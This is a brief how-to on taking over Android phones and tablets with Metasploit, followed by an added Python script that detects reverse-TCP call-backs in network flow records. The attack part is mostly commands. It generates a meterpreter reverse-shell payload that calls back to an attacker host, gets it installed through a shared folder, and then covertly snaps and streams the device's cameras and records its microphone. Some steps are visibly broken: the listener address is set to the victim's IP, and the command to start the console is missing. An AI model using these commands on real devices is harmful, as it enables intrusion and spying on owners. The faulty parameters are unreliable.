Exploiting Android with Metasploit
This article shows how an Android device can be compromised using Metasploit. The devices used are a Samsung S 8.4 tablet and an HTC M8 One smartphone, and the attacker uses a reverse TCP connection to make a call-back to the attacking host. In this case the attacking host is at 192.168.0.24, and the Android devices are at 192.168.0.9 (Samsung) and 192.168.0.10 (HTC M8).
Creating the Vulnerability
The vulnerability will create a call-back from the Android device to Metasploit. So if the attacking host is at 192.168.0.24, and we call back on port 443, then we create the exploit with:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.24 LPORT=443
Next we would save this to a shared folder (such as on Dropbox) and then install it on the device; alternatively, it could be downloaded over the Internet.
Once the exploit is on the device, we can use Metasploit to compromise it. To start the Metasploit console from Kali we run:
and then set up a handler for the exploit:
msf> use exploit/multi/handler
Next we define the payload for the exploit:
msf exploit> set payload android/meterpreter/reverse_tcp
Finally we set the connection details for the Samsung device with:
msf exploit (handler) > set LHOST 192.168.0.9
msf exploit (handler) > set LPORT 443
msf exploit (handler) > exploit
This then waits for a connection to the device, and once connected, Metasploit has a connection into the Android device:
The commands used are then:
meterpreter > webcam_list
1 - Back Camera
2 - Front Camera
meterpreter > webcam_snap 1
meterpreter > webcam_stream 1
meterpreter > record_mic -d 5
This article shows how an intruder can gain access to an Android device remotely, once an exploit has been installed.
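From the defender's side, the call-back described above shows up as a TCP connection from a mobile device to a peer on the same LAN that is not a known server. The following is an added example, not part of the original article: it scans flow records for that pattern. The flow-record format, the sample records and the allowlist of LAN servers are assumptions constructed for illustration; the device and listener addresses are the ones used in the article.

```python
import ipaddress
from collections import defaultdict

# Constructed sample flow records: "epoch src_ip src_port dst_ip dst_port proto"
SAMPLE_FLOWS = """\
1700000000 192.168.0.9 51234 8.8.8.8 443 tcp
1700000005 192.168.0.9 51240 192.168.0.24 443 tcp
1700000065 192.168.0.10 40112 192.168.0.24 443 tcp
1700000070 192.168.0.10 40120 192.168.0.1 53 udp
1700000090 192.168.0.9 51300 192.168.0.2 443 tcp
"""

MOBILE_DEVICES = {"192.168.0.9", "192.168.0.10"}    # device addresses from the article
KNOWN_LAN_SERVERS = {"192.168.0.1", "192.168.0.2"}  # assumed: router and intranet server


def suspicious_callbacks(text, devices=MOBILE_DEVICES, allowed=KNOWN_LAN_SERVERS):
    """Return {(peer_ip, peer_port): [device, ...]} for TCP flows that go from a
    monitored device to a private-address peer that is not an approved server."""
    hits = defaultdict(set)
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue  # skip blank or malformed records
        _ts, src, _sport, dst, dport, proto = fields
        if proto != "tcp" or src not in devices:
            continue
        try:
            peer = ipaddress.ip_address(dst)
        except ValueError:
            continue  # destination is not a valid IP address
        # A phone or tablet normally talks to Internet services or a few known
        # LAN hosts; a TCP session to any other internal peer is worth a look.
        if peer.is_private and dst not in allowed:
            hits[(dst, int(dport))].add(src)
    return {peer: sorted(devs) for peer, devs in hits.items()}


if __name__ == "__main__":
    for (ip, port), devs in suspicious_callbacks(SAMPLE_FLOWS).items():
        print(f"unexpected LAN peer {ip}:{port} contacted by {', '.join(devs)}")
```

Two devices reporting the same unlisted internal peer, as in the sample, is a stronger signal than a single hit.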